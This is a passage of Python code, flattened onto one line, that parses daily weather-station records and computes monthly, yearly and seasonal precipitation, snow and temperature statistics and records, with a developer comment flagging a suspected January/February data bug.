round(float(clmt[y][m][d].prcp),2) > clmt[y]["prcpPROP"]["day_max"][0]: clmt[y]["prcpPROP"]["day_max"][0] = round(float(clmt[y][m][d].prcp),2) clmt[y]["prcpPROP"]["day_max"][1] = [] clmt[y]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["prcp"].append(float(clmt[y][m][d].prcp)) if round(float(clmt[y][m][d].prcp),2) == clmt[y][m]["prcpPROP"]["day_max"][0]: clmt[y][m]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].prcp),2) > clmt[y][m]["prcpPROP"]["day_max"][0]: clmt[y][m]["prcpPROP"]["day_max"][0] = round(float(clmt[y][m][d].prcp),2) clmt[y][m]["prcpPROP"]["day_max"][1] = [] clmt[y][m]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": clmt[y]["prcpDAYS"] += 1 clmt[y][m]["prcpDAYS"] += 1 clmt[y][m][d].snow = each[8] flags_snow = each[9].split(",") clmt[y][m][d].snowM, clmt[y][m][d].snowQ, clmt[y][m][d].snowS, clmt[y][m][d].snowT = attchk(flags_snow) if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""]: if float(clmt[y][m][d].snow) > 0: clmt[y]["snow"].append(float(clmt[y][m][d].snow)) if round(float(clmt[y][m][d].snow),1) == clmt[y]["snowPROP"]["day_max"][0]: clmt[y]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snow),1) > clmt[y]["snowPROP"]["day_max"][0]: clmt[y]["snowPROP"]["day_max"][0] = round(float(clmt[y][m][d].snow),1) clmt[y]["snowPROP"]["day_max"][1] = [] clmt[y]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["snow"].append(float(clmt[y][m][d].snow)) if round(float(clmt[y][m][d].snow),1) == clmt[y][m]["snowPROP"]["day_max"][0]: clmt[y][m]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snow),1) > clmt[y][m]["snowPROP"]["day_max"][0]: clmt[y][m]["snowPROP"]["day_max"][0] = round(float(clmt[y][m][d].snow),1) clmt[y][m]["snowPROP"]["day_max"][1] = [] clmt[y][m]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": clmt[y]["snowDAYS"] += 1 clmt[y][m]["snowDAYS"] += 1 clmt[y][m][d].snwd = each[10] flags_snwd = each[11].split(",") clmt[y][m][d].snwdM, clmt[y][m][d].snwdQ, clmt[y][m][d].snwdS, clmt[y][m][d].snwdT = attchk(flags_snwd) if clmt[y][m][d].snwdQ in ignoreflags and clmt[y][m][d].snwd not in ["9999","-9999",""]: if float(clmt[y][m][d].snwd) > 0: clmt[y]["snwd"].append(float(clmt[y][m][d].snwd)) if round(float(clmt[y][m][d].snwd),1) == clmt[y]["snwdPROP"]["day_max"][0]: clmt[y]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snwd),1) > clmt[y]["snwdPROP"]["day_max"][0]: clmt[y]["snwdPROP"]["day_max"][0] = round(float(clmt[y][m][d].snwd),1) clmt[y]["snwdPROP"]["day_max"][1] = [] clmt[y]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["snwd"].append(float(clmt[y][m][d].snwd)) if round(float(clmt[y][m][d].snwd),1) == clmt[y][m]["snwdPROP"]["day_max"][0]: clmt[y][m]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snwd),1) > clmt[y][m]["snwdPROP"]["day_max"][0]: clmt[y][m]["snwdPROP"]["day_max"][0] = round(float(clmt[y][m][d].snwd),1) clmt[y][m]["snwdPROP"]["day_max"][1] = [] clmt[y][m]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].snwd) > 0 or clmt[y][m][d].snwdM == "T": clmt[y]["snwdDAYS"] += 1 clmt[y][m]["snwdDAYS"] += 1 clmt[y][m][d].tmax = each[12] flags_tmax = each[13].split(",") clmt[y][m][d].tmaxM, clmt[y][m][d].tmaxQ, clmt[y][m][d].tmaxS, clmt[y][m][d].tmaxT = attchk(flags_tmax) clmt[y][m][d].tmin = each[14] flags_tmin = each[15].split(",") clmt[y][m][d].tminM, clmt[y][m][d].tminQ, clmt[y][m][d].tminS, clmt[y][m][d].tminT = attchk(flags_tmin) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]: if (clmt[y][m][d].tmin != "" and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin)) or clmt[y][m][d].tmin == "": clmt[y]["tmax"].append(int(clmt[y][m][d].tmax)) clmt[y][m]["tmax"].append(int(clmt[y][m][d].tmax)) if int(clmt[y][m][d].tmax) == clmt[y]["tmaxPROP"]["day_max"][0]: clmt[y]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > clmt[y]["tmaxPROP"]["day_max"][0]: clmt[y]["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) clmt[y]["tmaxPROP"]["day_max"][1] = [] clmt[y]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y]["tmaxPROP"]["day_min"][0]: clmt[y]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < clmt[y]["tmaxPROP"]["day_min"][0]: clmt[y]["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) clmt[y]["tmaxPROP"]["day_min"][1] = [] clmt[y]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y][m]["tmaxPROP"]["day_max"][0]: clmt[y][m]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > clmt[y][m]["tmaxPROP"]["day_max"][0]: clmt[y][m]["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) clmt[y][m]["tmaxPROP"]["day_max"][1] = [] clmt[y][m]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y][m]["tmaxPROP"]["day_min"][0]: clmt[y][m]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < clmt[y][m]["tmaxPROP"]["day_min"][0]: clmt[y][m]["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) clmt[y][m]["tmaxPROP"]["day_min"][1] = [] clmt[y][m]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]: if (clmt[y][m][d].tmax != "" and int(clmt[y][m][d].tmin) <= int(clmt[y][m][d].tmax)) or clmt[y][m][d].tmax == "": clmt[y]["tmin"].append(int(clmt[y][m][d].tmin)) clmt[y][m]["tmin"].append(int(clmt[y][m][d].tmin)) if int(clmt[y][m][d].tmin) == clmt[y]["tminPROP"]["day_max"][0]: clmt[y]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > clmt[y]["tminPROP"]["day_max"][0]: clmt[y]["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) clmt[y]["tminPROP"]["day_max"][1] = [] clmt[y]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y]["tminPROP"]["day_min"][0]: clmt[y]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < clmt[y]["tminPROP"]["day_min"][0]: clmt[y]["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) clmt[y]["tminPROP"]["day_min"][1] = [] clmt[y]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y][m]["tminPROP"]["day_max"][0]: clmt[y][m]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > clmt[y][m]["tminPROP"]["day_max"][0]: clmt[y][m]["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) clmt[y][m]["tminPROP"]["day_max"][1] = [] clmt[y][m]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y][m]["tminPROP"]["day_min"][0]: clmt[y][m]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < clmt[y][m]["tminPROP"]["day_min"][0]: clmt[y][m]["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) clmt[y][m]["tminPROP"]["day_min"][1] = [] clmt[y][m]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""] and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""] and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): clmt[y]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) clmt[y]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) clmt[y][m]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) clmt[y][m]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) else: clmt[y][m][d] = DayRecord(each) statbuild(y,m,d) # MONTHLY STATS for y in [YR for YR in clmt if type(YR) == int]: for m in [MO for MO in clmt[y] if type(MO) == int]: # PRCP if round(sum(clmt[y][m]["prcp"]),2) not in clmt_vars_months["prcp"]: clmt_vars_months["prcp"][round(sum(clmt[y][m]["prcp"]),2)] = [datetime.date(y,m,1)] else: clmt_vars_months["prcp"][round(sum(clmt[y][m]["prcp"]),2)].append(datetime.date(y,m,1)) if clmt[y][m]["prcpDAYS"] not in clmt_vars_months["prcpDAYS"]: clmt_vars_months["prcpDAYS"][clmt[y][m]["prcpDAYS"]] = [datetime.date(y,m,1)] else: clmt_vars_months["prcpDAYS"][clmt[y][m]["prcpDAYS"]].append(datetime.date(y,m,1)) try: if round(sum(clmt[y][m]["prcp"]),2) == clmt[y]["prcpPROP"]["month_max"][0]: clmt[y]["prcpPROP"]["month_max"][1].append(m) elif round(sum(clmt[y][m]["prcp"]),2) > clmt[y]["prcpPROP"]["month_max"][0]: clmt[y]["prcpPROP"]["month_max"][0] = round(sum(clmt[y][m]["prcp"]),2) clmt[y]["prcpPROP"]["month_max"][1] = [] clmt[y]["prcpPROP"]["month_max"][1].append(m) if round(sum(clmt[y][m]["prcp"]),2) == clmt[y]["prcpPROP"]["month_min"][0]: clmt[y]["prcpPROP"]["month_min"][1].append(m) elif round(sum(clmt[y][m]["prcp"]),2) < clmt[y]["prcpPROP"]["month_min"][0]: clmt[y]["prcpPROP"]["month_min"][0] = round(sum(clmt[y][m]["prcp"]),2) clmt[y]["prcpPROP"]["month_min"][1] = [] clmt[y]["prcpPROP"]["month_min"][1].append(m) except: print("*** SKIPPED: Insufficient or erroneous PRCP data - {}-{}".format(y,str(m).zfill(2))) # SNOW if round(sum(clmt[y][m]["snow"]),1) not in clmt_vars_months["snow"]: clmt_vars_months["snow"][round(sum(clmt[y][m]["snow"]),1)] = [datetime.date(y,m,1)] else: clmt_vars_months["snow"][round(sum(clmt[y][m]["snow"]),1)].append(datetime.date(y,m,1)) if clmt[y][m]["snowDAYS"] not in clmt_vars_months["snowDAYS"]: clmt_vars_months["snowDAYS"][clmt[y][m]["snowDAYS"]] = [datetime.date(y,m,1)] else: clmt_vars_months["snowDAYS"][clmt[y][m]["snowDAYS"]].append(datetime.date(y,m,1)) #if sum(clmt[y][m]["snwd"]) not in clmt_vars_months["snwd"]: clmt_vars_months["snwd"][sum(clmt[y][m]["snwd"])] = [datetime.date(y,m,1)] #else: clmt_vars_months["snwd"][sum(clmt[y][m]["snwd"])].append(datetime.date(y,m,1)) try: if round(sum(clmt[y][m]["snow"]),1) == clmt[y]["snowPROP"]["month_max"][0]: clmt[y]["snowPROP"]["month_max"][1].append(m) elif round(sum(clmt[y][m]["snow"]),1) > clmt[y]["snowPROP"]["month_max"][0]: clmt[y]["snowPROP"]["month_max"][0] = round(sum(clmt[y][m]["snow"]),1) clmt[y]["snowPROP"]["month_max"][1] = [] clmt[y]["snowPROP"]["month_max"][1].append(m) except: print("*** SKIPPED: Insufficient or erroneous SNOW data - {}-{}".format(y,str(m).zfill(2))) # SNWD if clmt[y][m]["snwdDAYS"] not in clmt_vars_months["snwdDAYS"]: clmt_vars_months["snwdDAYS"][clmt[y][m]["snwdDAYS"]] = [datetime.date(y,m,1)] else: clmt_vars_months["snwdDAYS"][clmt[y][m]["snwdDAYS"]].append(datetime.date(y,m,1)) # TMAX if len(clmt[y][m]["tmax"]) > excludemonth: if round(mean(clmt[y][m]["tmax"]),1) not in clmt_vars_months["tmax"]: clmt_vars_months["tmax"][round(mean(clmt[y][m]["tmax"]),1)] = [datetime.date(y,m,1)] else: clmt_vars_months["tmax"][round(mean(clmt[y][m]["tmax"]),1)].append(datetime.date(y,m,1)) try: if round(mean(clmt[y][m]["tmax"]),1) == clmt[y]["tmaxPROP"]["month_AVG_max"][0]: clmt[y]["tmaxPROP"]["month_AVG_max"][1].append(m) elif round(mean(clmt[y][m]["tmax"]),1) > clmt[y]["tmaxPROP"]["month_AVG_max"][0]: clmt[y]["tmaxPROP"]["month_AVG_max"][0] = round(mean(clmt[y][m]["tmax"]),1) clmt[y]["tmaxPROP"]["month_AVG_max"][1] = [] clmt[y]["tmaxPROP"]["month_AVG_max"][1].append(m) if round(mean(clmt[y][m]["tmax"]),1) == clmt[y]["tmaxPROP"]["month_AVG_min"][0]: clmt[y]["tmaxPROP"]["month_AVG_min"][1].append(m) elif round(mean(clmt[y][m]["tmax"]),1) < clmt[y]["tmaxPROP"]["month_AVG_min"][0]: clmt[y]["tmaxPROP"]["month_AVG_min"][0] = round(mean(clmt[y][m]["tmax"]),1) clmt[y]["tmaxPROP"]["month_AVG_min"][1] = [] clmt[y]["tmaxPROP"]["month_AVG_min"][1].append(m) except: print("*** SKIPPED: Insufficient or erroneous TMAX data - {}-{}".format(y,str(m).zfill(2))) # TMIN if len(clmt[y][m]["tmin"]) > excludemonth: if round(mean(clmt[y][m]["tmin"]),1) not in clmt_vars_months["tmin"]: clmt_vars_months["tmin"][round(mean(clmt[y][m]["tmin"]),1)] = [datetime.date(y,m,1)] else: clmt_vars_months["tmin"][round(mean(clmt[y][m]["tmin"]),1)].append(datetime.date(y,m,1)) try: if round(mean(clmt[y][m]["tmin"]),1) == clmt[y]["tminPROP"]["month_AVG_max"][0]: clmt[y]["tminPROP"]["month_AVG_max"][1].append(m) elif round(mean(clmt[y][m]["tmin"]),1) > clmt[y]["tminPROP"]["month_AVG_max"][0]: clmt[y]["tminPROP"]["month_AVG_max"][0] = round(mean(clmt[y][m]["tmin"]),1) clmt[y]["tminPROP"]["month_AVG_max"][1] = [] clmt[y]["tminPROP"]["month_AVG_max"][1].append(m) if round(mean(clmt[y][m]["tmin"]),1) == clmt[y]["tminPROP"]["month_AVG_min"][0]: clmt[y]["tminPROP"]["month_AVG_min"][1].append(m) elif round(mean(clmt[y][m]["tmin"]),1) < clmt[y]["tminPROP"]["month_AVG_min"][0]: clmt[y]["tminPROP"]["month_AVG_min"][0] = round(mean(clmt[y][m]["tmin"]),1) clmt[y]["tminPROP"]["month_AVG_min"][1] = [] clmt[y]["tminPROP"]["month_AVG_min"][1].append(m) except: print("*** SKIPPED: Insufficient or erroneous TMIN data - {}-{}".format(y,str(m).zfill(2))) if len(clmt[y][m]["tempAVGlist"]) > excludemonth * 2: if round(mean(clmt[y][m]["tempAVGlist"]),1) not in clmt_vars_months["tavg"]: clmt_vars_months["tavg"][round(mean(clmt[y][m]["tempAVGlist"]),1)] = [datetime.date(y,m,1)] else: clmt_vars_months["tavg"][round(mean(clmt[y][m]["tempAVGlist"]),1)].append(datetime.date(y,m,1)) for YYYY in sorted([Y for Y in clmt if type(Y) == int]): # THIS IS THE CURRENT PROBLEM...NOT READING IN JAN/FEB DATA? if YYYY not in metclmt and any(MONTH >= 3 for MONTH in clmt[YYYY] if type(MONTH) == int): metclmt[YYYY] = {} for MM in sorted([M for M in clmt[YYYY] if type(M) == int]): if MM <= 2: if YYYY-1 in metclmt: metclmt[YYYY-1][MM] = clmt[YYYY][MM] else: metclmt[YYYY][MM] = clmt[YYYY][MM] for YYYY in [YEAR for YEAR in metclmt if type(YEAR) == int]: for s in ["spring","summer","fall","winter"]: metclmt[YYYY][s] = {} if s == "spring": metclmt[YYYY][s]["valid"] = [3,4,5] elif s == "summer": metclmt[YYYY][s]["valid"] = [6,7,8] elif s == "fall": metclmt[YYYY][s]["valid"] = [9,10,11] elif s == "winter": metclmt[YYYY][s]["valid"] = [12,1,2] else: return print("SEASON ERROR! Programmer! Check the seasons!") for y in [Y for Y in metclmt if type(Y) == int]: # PRCP metclmt[y]["recordqty"] = sum(metclmt[y][m]["recordqty"] for m in metclmt[y] if type(m) == int) #input("year = {}; recordqty = {}".format(y,metclmt[y]["recordqty"])) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["recordqty"] = sum(metclmt[y][m]["recordqty"] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]) metclmt[y]["prcp"] = [] for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcp"] = [] metclmt[y]["prcp"].extend(r for m in metclmt[y].keys() if type(m) == int for r in metclmt[y][m]["prcp"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcp"].extend(r for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for r in metclmt[y][m]["prcp"]) metclmt[y]["prcpDAYS"] = sum(metclmt[y][m]["prcpDAYS"] for m in metclmt[y] if type(m) == int) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcpDAYS"] = sum(metclmt[y][m]["prcpDAYS"] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]) metclmt[y]["prcpPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]],"month_min":[999,[]]} for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcpPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]],"month_min":[999,[]]} if len(metclmt[y]["prcp"]) > 0: metclmt[y]["prcpPROP"]["day_max"][0] = round(max(metclmt[y]["prcp"]),2) for s in ["spring","summer","fall","winter"]: if len(metclmt[y][s]["prcp"]) > 0: metclmt[y][s]["prcpPROP"]["day_max"][0] = round(max(metclmt[y][s]["prcp"]),2) metclmt[y]["prcpPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].prcpQ in ignoreflags and metclmt[y][m][d].prcp not in ["","-9999","9999"] and round(float(metclmt[y][m][d].prcp),2) == metclmt[y]["prcpPROP"]["day_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcpPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].prcpQ in ignoreflags and metclmt[y][m][d].prcp not in ["","-9999","9999"] and round(float(metclmt[y][m][d].prcp),2) == metclmt[y][s]["prcpPROP"]["day_max"][0]) #if y >= 2019: print(y,calendar.month_abbr[m]) metclmt[y]["prcpPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["prcp"]) for m in metclmt[y] if type(m) == int),2) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["prcpPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["prcp"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]),2) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["prcpPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and round(sum(metclmt[y][m]["prcp"]),2) == metclmt[y]["prcpPROP"]["month_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcpPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and round(sum(metclmt[y][m]["prcp"]),2) == metclmt[y][s]["prcpPROP"]["month_max"][0]) metclmt[y]["prcpPROP"]["month_min"][0] = round(min(sum(metclmt[y][m]["prcp"]) for m in metclmt[y] if type(m) == int),2) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["prcpPROP"]["month_min"][0] = round(min(sum(metclmt[y][m]["prcp"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]),2) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["prcpPROP"]["month_min"][1].extend(m for m in metclmt[y] if type(m) == int and round(sum(metclmt[y][m]["prcp"]),2) == metclmt[y]["prcpPROP"]["month_min"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcpPROP"]["month_min"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and round(sum(metclmt[y][m]["prcp"]),2) == metclmt[y][s]["prcpPROP"]["month_min"][0]) # SNOW metclmt[y]["snow"] = [] for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snow"] = [] metclmt[y]["snow"].extend(r for m in metclmt[y].keys() if type(m) == int for r in metclmt[y][m]["snow"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snow"].extend(r for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for r in metclmt[y][m]["snow"]) metclmt[y]["snowDAYS"] = sum(metclmt[y][m]["snowDAYS"] for m in metclmt[y] if type(m) == int) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snowDAYS"] = sum(metclmt[y][m]["snowDAYS"] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]) metclmt[y]["snowPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snowPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} if len(metclmt[y]["snow"]) > 0: metclmt[y]["snowPROP"]["day_max"][0] = round(max(metclmt[y]["snow"]),1) for s in ["spring","summer","fall","winter"]: if len(metclmt[y][s]["snow"]) > 0: metclmt[y][s]["snowPROP"]["day_max"][0] = round(max(metclmt[y][s]["snow"]),1) metclmt[y]["snowPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].snowQ in ignoreflags and metclmt[y][m][d].snow not in ["","-9999","9999"] and round(float(metclmt[y][m][d].snow),1) == metclmt[y]["snowPROP"]["day_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snowPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].snowQ in ignoreflags and metclmt[y][m][d].snow not in ["","-9999","9999"] and round(float(metclmt[y][m][d].snow),1) == metclmt[y][s]["snowPROP"]["day_max"][0]) metclmt[y]["snowPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["snow"]) for m in metclmt[y] if type(m) == int),1) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["snowPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["snow"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]),1) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["snowPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and round(sum(metclmt[y][m]["snow"]),1) == metclmt[y]["snowPROP"]["month_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snowPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and round(sum(metclmt[y][m]["snow"]),1) == metclmt[y][s]["snowPROP"]["month_max"][0]) # SNWD metclmt[y]["snwd"] = [] for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwd"] = [] metclmt[y]["snwd"].extend(r for m in metclmt[y].keys() if type(m) == int for r in metclmt[y][m]["snwd"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwd"].extend(r for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for r in metclmt[y][m]["snwd"]) metclmt[y]["snwdDAYS"] = sum(metclmt[y][m]["snwdDAYS"] for m in metclmt[y] if type(m) == int) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdDAYS"] = sum(metclmt[y][m]["snwdDAYS"] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]) #metclmt[y]["snwdDAYS"] = sum(metclmt[y][m]["snwdDAYS"] for m in metclmt[y] if type(m) == int) #for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdDAYS"] = sum(metclmt[y][m]["snwdDAYS"] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]) #metclmt[y]["snwdPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} metclmt[y]["snwdPROP"] = {"day_max":[-1,[]]} #for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdPROP"] = {"day_max":[-1,[]]} if len(metclmt[y]["snwd"]) > 0: metclmt[y]["snwdPROP"]["day_max"][0] = round(max(metclmt[y]["snwd"]),1) for s in ["spring","summer","fall","winter"]: if len(metclmt[y][s]["snwd"]) > 0: metclmt[y][s]["snwdPROP"]["day_max"][0] = round(max(metclmt[y][s]["snwd"]),1) metclmt[y]["snwdPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].snwdQ in ignoreflags and metclmt[y][m][d].snwd not in ["","-9999","9999"] and round(float(metclmt[y][m][d].snwd),1) == metclmt[y]["snwdPROP"]["day_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].snwdQ in ignoreflags and metclmt[y][m][d].snwd not in ["","-9999","9999"] and round(float(metclmt[y][m][d].snwd),1) == metclmt[y][s]["snwdPROP"]["day_max"][0]) #metclmt[y]["snwdPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["snwd"]) for m in metclmt[y] if type(m) == int),1) #for s in ["spring","summer","fall","winter"]: #try: metclmt[y][s]["snwdPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["snwd"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]),2) #except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) #metclmt[y]["snwdPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and round(sum(metclmt[y][m]["snwd"]),2) == metclmt[y]["snwdPROP"]["month_max"][0]) #for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and round(sum(metclmt[y][m]["snwd"]),2) == metclmt[y][s]["snwdPROP"]["month_max"][0]) # TAVG metclmt[y]["tempAVGlist"] = [] for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tempAVGlist"] = [] metclmt[y]["tempAVGlist"].extend(ta for m in metclmt[y].keys() if type(m) == int for ta in metclmt[y][m]["tempAVGlist"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tempAVGlist"].extend(ta for m in metclmt[y].keys() if type(m) == int and m in metclmt[y][s]["valid"] for ta in metclmt[y][m]["tempAVGlist"]) # TMAX metclmt[y]["tmax"] = [] for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmax"] = [] metclmt[y]["tmax"].extend(tx for m in metclmt[y].keys() if type(m) == int for tx in metclmt[y][m]["tmax"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmax"].extend(tx for m in metclmt[y].keys() if type(m) == int and m in metclmt[y][s]["valid"] for tx in metclmt[y][m]["tmax"]) metclmt[y]["tmaxPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmaxPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} if len(metclmt[y]["tmax"]) > 0: metclmt[y]["tmaxPROP"]["day_max"][0] = max(metclmt[y]["tmax"]) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["tmaxPROP"]["day_max"][0] = max(metclmt[y][s]["tmax"]) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["tmaxPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tmaxQ in ignoreflags and metclmt[y][m][d].tmax not in ["","-9999","9999"] and int(metclmt[y][m][d].tmax) == metclmt[y]["tmaxPROP"]["day_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmaxPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tmaxQ in ignoreflags and metclmt[y][m][d].tmax not in 